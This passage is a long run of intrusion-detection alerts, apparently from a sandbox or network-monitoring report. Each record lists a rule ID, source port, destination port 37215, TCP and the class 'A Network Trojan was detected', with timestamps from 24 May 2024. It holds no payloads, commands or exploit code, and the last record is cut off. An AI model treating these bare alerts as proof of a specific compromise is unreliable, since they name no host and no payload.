              SID:2835222
              Source Port:47338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149130
              SID:2829579
              Source Port:39896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077039
              SID:2835222
              Source Port:37986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448764
              SID:2829579
              Source Port:49542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859990
              SID:2829579
              Source Port:49362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.080801
              SID:2829579
              Source Port:52658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.741286
              SID:2835222
              Source Port:55098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371979
              SID:2829579
              Source Port:56350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507602
              SID:2829579
              Source Port:59306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601526
              SID:2829579
              Source Port:43932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573540
              SID:2835222
              Source Port:59928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.775359
              SID:2835222
              Source Port:58148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.836361
              SID:2835222
              Source Port:44994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570480
              SID:2829579
              Source Port:55010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797321
              SID:2835222
              Source Port:46674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459718
              SID:2829579
              Source Port:54662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.247757
              SID:2829579
              Source Port:37824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313248
              SID:2829579
              Source Port:42188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689741
              SID:2835222
              Source Port:54342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868436
              SID:2835222
              Source Port:55018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368699
              SID:2829579
              Source Port:43276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623732
              SID:2829579
              Source Port:44380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151238
              SID:2829579
              Source Port:38360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063056
              SID:2829579
              Source Port:59460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368717
              SID:2835222
              Source Port:59680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474583
              SID:2835222
              Source Port:60322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100547
              SID:2829579
              Source Port:58128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153153
              SID:2835222
              Source Port:38278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340523
              SID:2829579
              Source Port:46154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.241928
              SID:2835222
              Source Port:51694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.362044
              SID:2829579
              Source Port:59144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122720
              SID:2829579
              Source Port:45908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631713
              SID:2829579
              Source Port:41010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542137
              SID:2835222
              Source Port:50090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.067952
              SID:2829579
              Source Port:60138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570479
              SID:2829579
              Source Port:48194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409260
              SID:2829579
              Source Port:40838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801925
              SID:2835222
              Source Port:49568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.426421
              SID:2829579
              Source Port:48564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625651
              SID:2835222
              Source Port:57762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408080
              SID:2829579
              Source Port:49118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231827
              SID:2835222
              Source Port:36454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663522
              SID:2829579
              Source Port:39754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572702
              SID:2829579
              Source Port:37206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.488206
              SID:2829579
              Source Port:37960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489562
              SID:2829579
              Source Port:38710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575211
              SID:2835222
              Source Port:53214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.362179
              SID:2835222
              Source Port:59638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858954
              SID:2835222
              Source Port:49242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802811
              SID:2829579
              Source Port:48082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.821741
              SID:2835222
              Source Port:40224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208205
              SID:2835222
              Source Port:49004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518903
              SID:2829579
              Source Port:48738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341119
              SID:2829579
              Source Port:59862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432461
              SID:2829579
              Source Port:57708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462911
              SID:2835222
              Source Port:47002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519089
              SID:2829579
              Source Port:55156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551297
              SID:2829579
              Source Port:50126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251687
              SID:2835222
              Source Port:41796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640600
              SID:2829579
              Source Port:34772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640891
              SID:2835222
              Source Port:44882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638865
              SID:2835222
              Source Port:41996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921199
              SID:2829579
              Source Port:54826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059476
              SID:2835222
              Source Port:38412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150788
              SID:2829579
              Source Port:53158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368636
              SID:2835222
              Source Port:51212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501868
              SID:2835222
              Source Port:33532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300063
              SID:2829579
              Source Port:44302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341093
              SID:2829579
              Source Port:59718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.981054
              SID:2829579
              Source Port:42740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664557
              SID:2835222
              Source Port:34606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103072
              SID:2829579
              Source Port:52888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270477
              SID:2829579
              Source Port:60840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372565
              SID:2829579
              Source Port:43972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460469
              SID:2829579
              Source Port:53582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.580020
              SID:2829579
              Source Port:47774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207107
              SID:2835222
              Source Port:45908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150514
              SID:2829579
              Source Port:51800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639312
              SID:2829579
              Source Port:53050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536208
              SID:2829579
              Source Port:35290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544288
              SID:2835222
              Source Port:56796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.770906
              SID:2829579
              Source Port:55370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.886886
              SID:2829579
              Source Port:50980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481392
              SID:2835222
              Source Port:39776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804826
              SID:2835222
              Source Port:34174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394547
              SID:2829579
              Source Port:53504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.426473
              SID:2829579
              Source Port:53478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544302
              SID:2835222
              Source Port:55302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.121532
              SID:2835222
              Source Port:45154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101049
              SID:2829579
              Source Port:52012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550580
              SID:2829579
              Source Port:49842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100593
              SID:2835222
              Source Port:41954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600631
              SID:2829579
              Source Port:51548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835210
              SID:2829579
              Source Port:58426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279089
              SID:2835222
              Source Port:37278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245778
              SID:2835222
              Source Port:44004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430651
              SID:2835222
              Source Port:47872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857793
              SID:2835222
              Source Port:47702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445005
              SID:2829579
              Source Port:41098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.886915
              SID:2829579
              Source Port:46294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.677318
              SID:2835222
              Source Port:45956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278427
              SID:2835222
              Source Port:50080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624445
              SID:2835222
              Source Port:54396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502611
              SID:2829579
              Source Port:52324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923534
              SID:2835222
              Source Port:44512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449293
              SID:2829579
              Source Port:51216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490433
              SID:2835222
              Source Port:39872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.073317
              SID:2835222
              Source Port:41130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060857
              SID:2835222
              Source Port:55588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858373
              SID:2829579
              Source Port:36218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.123981
              SID:2835222
              Source Port:44296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343537
              SID:2835222
              Source Port:43632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127208
              SID:2835222
              Source Port:60036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764955
              SID:2829579
              Source Port:41126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921022
              SID:2835222
              Source Port:40334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638747
              SID:2835222
              Source Port:53148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444725
              SID:2835222
              Source Port:52062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987367
              SID:2829579
              Source Port:52290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333823
              SID:2835222
              Source Port:51604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309229
              SID:2829579
              Source Port:53364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.377216
              SID:2835222
              Source Port:38290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431601
              SID:2829579
              Source Port:47650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459615
              SID:2835222
              Source Port:39150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724959
              SID:2829579
              Source Port:53478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205905
              SID:2829579
              Source Port:42220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049128
              SID:2835222
              Source Port:47266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347823
              SID:2835222
              Source Port:34692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517856
              SID:2829579
              Source Port:41578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390733
              SID:2829579
              Source Port:49566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663631
              SID:2835222
              Source Port:51006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870129
              SID:2829579
              Source Port:55454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458999
              SID:2835222
              Source Port:41862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486461
              SID:2835222
              Source Port:40952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270381
              SID:2835222
              Source Port:53416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409184
              SID:2829579
              Source Port:43366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443685
              SID:2835222
              Source Port:58186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231719
              SID:2829579
              Source Port:51740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.586897
              SID:2835222
              Source Port:52190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117252
              SID:2829579
              Source Port:60526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396710
              SID:2829579
              Source Port:52738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.629374
              SID:2835222
              Source Port:39896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517239
              SID:2835222
              Source Port:33244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452010
              SID:2835222
              Source Port:60730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409141
              SID:2829579
              Source Port:54998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358438
              SID:2829579
              Source Port:45482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101531
              SID:2829579
              Source Port:58842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055341
              SID:2835222
              Source Port:60294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478383
              SID:2835222
              Source Port:57700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044560
              SID:2835222
              Source Port:49486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534372
              SID:2835222
              Source Port:48052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115153
              SID:2835222
              Source Port:40616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547963
              SID:2835222
              Source Port:45062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600175
              SID:2835222
              Source Port:37576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480855
              SID:2835222
              Source Port:44440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638380
              SID:2829579
              Source Port:55850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246417
              SID:2829579
              Source Port:48528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270015
              SID:2835222
              Source Port:42026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493534
              SID:2835222
              Source Port:60932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764415
              SID:2835222
              Source Port:52608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053175
              SID:2829579
              Source Port:48930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543483
              SID:2835222
              Source Port:37050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.707771
              SID:2835222
              Source Port:42948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.774422
              SID:2829579
              Source Port:44864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483647
              SID:2829579
              Source Port:34592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.192992
              SID:2835222
              Source Port:46422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341355
              SID:2835222
              Source Port:42616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.398242
              SID:2829579
              Source Port:45246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598956
              SID:2829579
              Source Port:39140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492382
              SID:2829579
              Source Port:49196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492126
              SID:2835222
              Source Port:59040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.426357
              SID:2835222
              Source Port:35212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055720
              SID:2829579
              Source Port:35408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063873
              SID:2829579
              Source Port:36072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115984
              SID:2829579
              Source Port:39124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.434540
              SID:2835222
              Source Port:47856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486988
              SID:2835222
              Source Port:54470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551285
              SID:2835222
              Source Port:51374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483667
              SID:2829579
              Source Port:56540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458376
              SID:2835222
              Source Port:40864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823106
              SID:2829579
              Source Port:58070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.406588
              SID:2829579
              Source Port:50130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165761
              SID:2835222
              Source Port:50668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424170
              SID:2835222
              Source Port:52998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878005
              SID:2835222
              Source Port:37976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341076
              SID:2835222
              Source Port:40672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536716
              SID:2835222
              Source Port:53236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536385
              SID:2829579
              Source Port:42830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267796
              SID:2835222
              Source Port:55836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340623
              SID:2829579
              Source Port:53676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549205
              SID:2835222
              Source Port:40420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332198
              SID:2835222
              Source Port:60462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530784
              SID:2835222
              Source Port:41116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374039
              SID:2835222
              Source Port:45606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692248
              SID:2829579
              Source Port:48994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544301
              SID:2835222
              Source Port:59296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535210
              SID:2835222
              Source Port:56602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.074220
              SID:2829579
              Source Port:56270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624748
              SID:2835222
              Source Port:34766
              Destination Port:37215
